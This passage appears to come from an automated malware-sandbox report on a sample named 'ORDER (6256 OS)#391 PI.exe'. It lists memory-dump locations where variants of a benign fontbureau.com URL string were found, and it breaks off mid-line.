Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304887480.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com9
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comFQO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comK
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comR.TTF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comT.TTF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comW.TTF0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comals
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comalsq
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.come.comQO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comedFB
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comessedK
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comiona
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.commB
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp	String found in 